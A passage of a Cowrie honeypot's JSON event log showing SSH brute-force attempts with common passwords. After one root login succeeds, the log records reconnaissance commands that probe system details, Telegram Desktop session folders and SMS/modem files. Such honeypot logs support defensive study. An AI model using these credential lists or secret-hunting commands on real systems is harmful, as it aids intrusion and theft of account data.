2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:30:58.235046Z","src_ip":"196.251.115.108","session":"ae0a1858edb1"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456789","message":"login attempt [ftpuser/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T23:31:01.964440Z","src_ip":"196.251.115.108","session":"ae0a1858edb1"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:31:03.300486Z","src_ip":"196.251.115.108","session":"ae0a1858edb1"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":55744,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7ba5b4867fc","protocol":"ssh","message":"New connection: 196.251.115.108:55744 (1.2.3.4:22) [session: c7ba5b4867fc]","sensor":"my-vps","timestamp":"2025-08-24T23:31:45.596158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:31:45.910736Z","src_ip":"196.251.115.108","session":"c7ba5b4867fc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:31:45.911688Z","src_ip":"196.251.115.108","session":"c7ba5b4867fc"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345","message":"login attempt [ftpuser/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T23:31:49.497188Z","src_ip":"196.251.115.108","session":"c7ba5b4867fc"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:31:50.757032Z","src_ip":"196.251.115.108","session":"c7ba5b4867fc"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":32954,"dst_ip":"1.2.3.4","dst_port":22,"session":"de54ac461d91","protocol":"ssh","message":"New connection: 196.251.115.108:32954 (1.2.3.4:22) [session: de54ac461d91]","sensor":"my-vps","timestamp":"2025-08-24T23:32:33.573940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:32:33.872083Z","src_ip":"196.251.115.108","session":"de54ac461d91"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:32:33.873183Z","src_ip":"196.251.115.108","session":"de54ac461d91"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345678","message":"login attempt [ftpuser/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T23:32:37.661078Z","src_ip":"196.251.115.108","session":"de54ac461d91"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:32:38.762124Z","src_ip":"196.251.115.108","session":"de54ac461d91"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":39442,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae136f854310","protocol":"ssh","message":"New connection: 196.251.115.108:39442 (1.2.3.4:22) [session: ae136f854310]","sensor":"my-vps","timestamp":"2025-08-24T23:33:20.586188Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:33:20.944827Z","src_ip":"196.251.115.108","session":"ae136f854310"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:33:20.945494Z","src_ip":"196.251.115.108","session":"ae136f854310"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"qwerty","message":"login attempt [ftpuser/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-24T23:33:23.018283Z","src_ip":"196.251.115.108","session":"ae136f854310"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:33:24.034151Z","src_ip":"196.251.115.108","session":"ae136f854310"}
{"eventid":"cowrie.session.connect","src_ip":"59.21.231.72","src_port":56546,"dst_ip":"1.2.3.4","dst_port":22,"session":"3728727dcf6d","protocol":"ssh","message":"New connection: 59.21.231.72:56546 (1.2.3.4:22) [session: 3728727dcf6d]","sensor":"my-vps","timestamp":"2025-08-24T23:33:45.908477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-24T23:33:45.909176Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-08-24T23:33:46.183143Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-24T23:33:47.820500Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:33:49.094487Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:33:49.671095Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-24T23:33:49.671817Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-24T23:33:49.672227Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:33:49.945809Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:33:50.612861Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-08-24T23:33:50.613550Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:33:50.887640Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:33:51.482413Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-24T23:33:51.483216Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:33:51.756519Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:33:52.318243Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-08-24T23:33:52.319137Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:33:52.597748Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:33:53.251426Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-24T23:33:53.252426Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:33:53.527483Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:33:54.096860Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-24T23:33:54.097917Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:33:54.372884Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:33:55.008133Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-08-24T23:33:55.009002Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:33:55.285588Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:33:55.882388Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-08-24T23:33:55.883124Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","size":0,"shasum":"3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:33:56.186972Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:33:56.754077Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-08-24T23:33:56.754778Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:33:57.027568Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":44770,"dst_ip":"1.2.3.4","dst_port":22,"session":"2269ea648f1a","protocol":"ssh","message":"New connection: 196.251.115.108:44770 (1.2.3.4:22) [session: 2269ea648f1a]","sensor":"my-vps","timestamp":"2025-08-24T23:34:07.094018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:34:07.406063Z","src_ip":"196.251.115.108","session":"2269ea648f1a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:34:07.407099Z","src_ip":"196.251.115.108","session":"2269ea648f1a"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123123","message":"login attempt [ftpuser/123123] failed","sensor":"my-vps","timestamp":"2025-08-24T23:34:10.819103Z","src_ip":"196.251.115.108","session":"2269ea648f1a"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:34:11.945816Z","src_ip":"196.251.115.108","session":"2269ea648f1a"}
{"eventid":"cowrie.session.closed","duration":"35.8","message":"Connection lost after 35.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:34:21.682594Z","src_ip":"59.21.231.72","session":"3728727dcf6d"}
{"eventid":"cowrie.session.connect","src_ip":"112.46.214.31","src_port":56004,"dst_ip":"1.2.3.4","dst_port":23,"session":"cf4561753dd8","protocol":"telnet","message":"New connection: 112.46.214.31:56004 (1.2.3.4:23) [session: cf4561753dd8]","sensor":"my-vps","timestamp":"2025-08-24T23:34:44.139508Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":52170,"dst_ip":"1.2.3.4","dst_port":22,"session":"294674dfc310","protocol":"ssh","message":"New connection: 196.251.115.108:52170 (1.2.3.4:22) [session: 294674dfc310]","sensor":"my-vps","timestamp":"2025-08-24T23:34:55.634365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:34:56.037505Z","src_ip":"196.251.115.108","session":"294674dfc310"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:34:56.038315Z","src_ip":"196.251.115.108","session":"294674dfc310"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"111111","message":"login attempt [ftpuser/111111] failed","sensor":"my-vps","timestamp":"2025-08-24T23:34:59.280846Z","src_ip":"196.251.115.108","session":"294674dfc310"}
{"eventid":"cowrie.session.closed","duration":15.526708602905273,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:34:59.666123Z","src_ip":"112.46.214.31","session":"cf4561753dd8"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:35:00.314166Z","src_ip":"196.251.115.108","session":"294674dfc310"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":55046,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cb201e159cf","protocol":"ssh","message":"New connection: 196.251.115.108:55046 (1.2.3.4:22) [session: 1cb201e159cf]","sensor":"my-vps","timestamp":"2025-08-24T23:35:43.887142Z"}
